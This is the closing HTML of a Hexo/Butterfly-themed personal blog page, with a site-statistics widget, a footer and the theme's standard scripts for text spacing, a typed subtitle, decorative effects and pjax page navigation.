class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2023/09/"><span class="card-archive-list-date">九月 2023</span><span class="card-archive-list-count">5</span></a></li></ul></div><div class="card-widget card-webinfo"><div class="item-headline"><i class="fas fa-chart-line"></i><span>网站资讯</span></div><div class="webinfo"><div class="webinfo-item"><div class="item-name">文章数目 :</div><div class="item-count">60</div></div><div class="webinfo-item"><div class="item-name">已运行时间 
:</div><div class="item-count" id="runtimeshow" data-publishDate="2021-12-06T16:00:00.000Z"></div></div><div class="webinfo-item"><div class="item-name">本站总字数 :</div><div class="item-count">69k</div></div><div class="webinfo-item"><div class="item-name">本站访客数 :</div><div class="item-count" id="busuanzi_value_site_uv"></div></div><div class="webinfo-item"><div class="item-name">本站总访问量 :</div><div class="item-count" id="busuanzi_value_site_pv"></div></div><div class="webinfo-item"><div class="item-name">最后更新时间 :</div><div class="item-count" id="last-push-date" data-lastPushDate="2024-06-04T03:41:50.855Z"></div></div></div></div></div></div></main><footer id="footer" style="background-image: url('/img/bg.jpg')"><div id="footer-wrap"><div class="copyright">©2020 - 2024 By Hyyrent</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div><div class="footer_custom_text">Hi, welcome to my <a href="https://pizz33.github.io/">blog</a>!</div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="translateLink" type="button" title="简繁转换">簡</button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.js"></script><script>function panguFn () {
if (typeof pangu === 'object') pangu.autoSpacingPage()
else {
getScript('https://cdn.jsdelivr.net/npm/pangu/dist/browser/pangu.min.js')
.then(() => {
pangu.autoSpacingPage()
})
}
}
// Entry point for pangu auto-spacing. The "only on post pages" switch is
// baked in by the generator as a literal `false`, so the post-only branch is
// dead and every page runs panguFn().
function panguInit () {
  const onlyOnPosts = false
  if (!onlyOnPosts) {
    panguFn()
    return
  }
  GLOBAL_CONFIG_SITE.isPost && panguFn()
}
document.addEventListener('DOMContentLoaded', panguInit)</script><div class="js-pjax"><script>function subtitleType () {
if (true) {
window.typed = new Typed("#subtitle", {
strings: ["潜心静学,不骄不躁"],
startDelay: 300,
typeSpeed: 150,
loop: true,
backSpeed: 50
})
} else {
document.getElementById("subtitle").innerHTML = '潜心静学,不骄不躁'
}
}
if (true) {
if (typeof Typed === 'function') {
subtitleType()
} else {
getScript('https://cdn.jsdelivr.net/npm/typed.js/lib/typed.min.js').then(subtitleType)
}
} else {
subtitleType()
}</script></div><script defer="defer" id="ribbon" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/canvas-ribbon.min.js" size="150" alpha="0.6" zIndex="-1" mobile="false" data-click="true"></script><script id="click-heart" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/click-heart.min.js" async="async" mobile="true"></script><script src="https://cdn.jsdelivr.net/npm/pjax/pjax.min.js"></script><script>let pjaxSelectors = ["title","#config-diff","#body-wrap","#rightside-config-hide","#rightside-config-show",".js-pjax"]
// Pjax instance for in-site navigation. Declared with `var` so it lands on
// window, where the pjax:error handler below (and other scripts) can reach it.
var pjax = new Pjax({
  // Regions swapped on navigation; defined on the preceding line.
  selectors: pjaxSelectors,
  // Links opening a new tab are left to the browser.
  elements: 'a:not([target="_blank"])',
  scrollRestoration: false,
  analytics: false,
  cacheBust: false
})
// Before pjax swaps the page: tear down per-page listeners and widgets so
// they are not duplicated when the new page is wired up.
document.addEventListener('pjax:send', () => {
  if (window.tocScrollFn) window.removeEventListener('scroll', window.tocScrollFn)
  if (window.scrollCollect) window.removeEventListener('scroll', scrollCollect)
  if (typeof preloader === 'object') preloader.initLoading()
  document.getElementById('rightside').style.cssText = "opacity: ''; transform: ''"
  // Destroy every music player that is not pinned to the viewport.
  if (window.aplayers) {
    for (let idx = 0; idx < window.aplayers.length; idx++) {
      const player = window.aplayers[idx]
      if (!player.options.fixed) player.destroy()
    }
  }
  if (typeof typed === 'object') typed.destroy()
  // Leave read mode so the next page starts in the normal layout.
  const bodyClasses = document.body.classList
  if (bodyClasses.contains('read-mode')) bodyClasses.remove('read-mode')
})
// After pjax has swapped the page: re-initialise the theme and re-run the
// inline scripts the new fragment carries.
document.addEventListener('pjax:complete', () => {
  window.refreshFn()
  // Script tags swapped in with the fragment do not execute on their own, so
  // each <script data-pjax> is replaced by a freshly built clone of itself.
  // NOTE(review): pjax is expected to follow same-origin links only, so these
  // are the site's own inline scripts — confirm for the Pjax version in use.
  const pjaxScripts = document.querySelectorAll('script[data-pjax]')
  pjaxScripts.forEach(oldScript => {
    const freshScript = document.createElement('script')
    const code = oldScript.text || oldScript.textContent || oldScript.innerHTML || ""
    for (const attr of Array.from(oldScript.attributes)) {
      freshScript.setAttribute(attr.name, attr.value)
    }
    freshScript.appendChild(document.createTextNode(code))
    oldScript.parentNode.replaceChild(freshScript, oldScript)
  })
  if (GLOBAL_CONFIG.islazyload) window.lazyLoadInstance.update()
  if (typeof chatBtnFn === 'function') chatBtnFn()
  if (typeof panguInit === 'function') panguInit()
  // google analytics
  if (typeof gtag === 'function') gtag('config', '', {'page_path': window.location.pathname})
  // baidu analytics
  if (typeof _hmt === 'object') _hmt.push(['_trackPageview', window.location.pathname])
  if (typeof loadMeting === 'function' && document.getElementsByClassName('aplayer').length) loadMeting()
  // prismjs
  if (typeof Prism === 'object') Prism.highlightAll()
  if (typeof preloader === 'object') preloader.endLoading()
})
document.addEventListener('pjax:error', (e) => {
if (e.request.status === 404) {
pjax.loadUrl('/404.html')
}
})</script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>